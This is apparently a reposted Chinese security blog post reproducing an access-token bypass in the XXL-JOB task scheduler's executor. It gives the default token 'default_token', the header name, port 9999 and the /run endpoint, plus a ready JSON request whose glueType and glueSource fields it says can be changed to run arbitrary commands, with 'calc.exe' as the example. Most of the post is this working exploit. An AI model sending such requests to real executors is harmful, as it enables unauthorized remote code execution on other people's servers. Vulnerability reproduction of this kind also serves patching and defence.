1、前言
今天看到网上爆出xxl-job新漏洞,说是存在默认accesstoken
判断accesstoken正确后就可以请求/run接口进行RCE。
在请求中增加请求头XXL-JOB-ACCESS-TOKEN: default_token即可利用漏洞。漏洞主要影响执行器,默认端口为9999
2、复现
直接访问http://xxx.com:9999/run返回
{"code":500,"msg":"invalid request, HttpMethod not support."}
post访问返回{"code":500,"msg":"The access token is wrong."}
加上请求头,可以直接请求接口
进一步利用,可根据实际情况修改glueType和glueSource参数
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "SERIAL_EXECUTION",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586373637819,
"glueType": "GLUE_POWERSHELL",
"glueSource": "calc.exe",
"glueUpdatetime": 1586693836758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
原文始发于微信公众号(0x00001):漏洞复现|XXL-JOB任务调度系统 ACCESS-TOKEN权限绕过漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论